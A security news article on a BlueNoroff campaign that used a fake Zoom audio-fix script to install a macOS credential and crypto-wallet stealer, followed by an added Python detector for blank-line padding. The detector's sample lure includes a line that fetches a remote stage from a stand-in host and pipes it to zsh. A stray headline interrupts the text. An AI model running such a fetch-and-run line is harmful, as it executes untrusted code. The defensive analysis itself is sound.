The Field Effect Analysis team has uncovered a targeted scam linked to BlueNoroff, a subgroup of North Korea's state-sponsored hacking apparatus. A well-known Canadian gambling company was caught in the scheme, which relied on impersonating trusted identities and on Zoom as the pretext. BlueNoroff's method included look-alike domains such as zoom-tech[.]us, used to target the victim during a meeting about cryptocurrency.
The attackers claimed there were audio problems and asked the victim to run a script presented as a Zoom audio repair file. According to Field Effect's report, the script contained thousands of blank lines to push its true, malicious commands out of view. Malware followed shortly afterwards, enabling theft of sensitive data such as login credentials and browser account profiles.
The attack combined technical precision with psychological pressure and deception. First, the lure redirected the victim to zoom-tech[.]us, which WHOIS records show was registered on April 14, 2025. The investigation found that this domain is linked to others registered with the same misleading WHOIS data. When triggered, the script used curl and zsh to fetch additional files and a password-harvesting payload.
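The padding trick described above is easy to triage mechanically. The following is an added example, not Field Effect's tooling: it scores a shell script by its share of blank lines and the longest run of them, then reports the commands that sit behind the padding. The thresholds and the sample script are constructed for illustration.

```python
"""Heuristic triage for shell scripts that hide commands behind blank-line padding."""
import re

# Hypothetical thresholds; tune them against your own corpus of legitimate scripts.
MIN_BLANK_RUN = 500      # a run of consecutive blank lines this long is padding
MIN_BLANK_RATIO = 0.90   # share of all lines that are blank
# Tools the report says the lure script used to stage and exfiltrate data.
FETCH_PATTERN = re.compile(r"\b(curl|zsh|rsync)\b")


def longest_blank_run(lines):
    """Return the longest run of consecutive whitespace-only lines."""
    longest = run = 0
    for line in lines:
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    return longest


def hidden_commands(lines, min_run=MIN_BLANK_RUN):
    """Return non-blank lines that appear after a blank run of at least min_run lines."""
    run, after_padding, found = 0, False, []
    for line in lines:
        if not line.strip():
            run += 1
            after_padding = after_padding or run >= min_run
            continue
        run = 0
        if after_padding:
            found.append(line.strip())
    return found


def triage_script(text):
    """Score a script's text; 'suspicious' is set when padding conceals commands."""
    lines = text.splitlines()
    blank_ratio = sum(1 for l in lines if not l.strip()) / max(len(lines), 1)
    hidden = hidden_commands(lines)
    return {
        "blank_ratio": round(blank_ratio, 3),
        "longest_blank_run": longest_blank_run(lines),
        "hidden_commands": hidden,
        "fetch_commands": [l for l in hidden if FETCH_PATTERN.search(l)],
        "suspicious": blank_ratio >= MIN_BLANK_RATIO and bool(hidden),
    }


# Constructed samples: a padded lure in the style the report describes, and a benign script.
SAMPLE = ("#!/bin/zsh\n# Zoom audio fix\necho 'Repairing audio...'\n" + "\n" * 5000
          + "curl -s https://example.invalid/stage2 | zsh\n")
BENIGN = "#!/bin/sh\n\nset -e\n\necho hi\n"

if __name__ == "__main__":
    print(triage_script(SAMPLE))
    print(triage_script(BENIGN))
```

Run it over scripts users are asked to execute by meeting participants; a hit on `fetch_commands` behind padding is a strong signal worth blocking and investigating.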
BlueNoroff Malware Campaign Targets Crypto Wallets with Stealthy macOS Attacks
Stolen user account passwords were exfiltrated during this step, a clear sign of credential theft. Next, a LaunchDaemon configuration installed the malware persistently so that it ran whenever the system started. The malware used innocuous names such as "Wi-Fi Updater" and injected its code into other macOS processes by abusing special entitlements. In parallel, separate routines collected browser data, system information, and keychain files, using rsync and curl to move them.
Cryptocurrency wallets held in browsers such as Brave were targeted in these parallel collection stages. The use of temporary directories, and the deletion of staging files after they ran, kept the malware's footprint small and hard to trace. The attackers used C2 domains such as ajayplamingo[.]com and zmwebsdk[.]com to send the stolen data off the device. The campaign has been active since at least March 2025 and continues to target cryptocurrency operators.
BlueNoroff's operations have expanded across North America, South Korea, Japan, and Europe, underlining a global financial motive. Security teams should monitor for the indicators published in the report, block the execution of unapproved scripts, and train users to recognise and resist this kind of social engineering.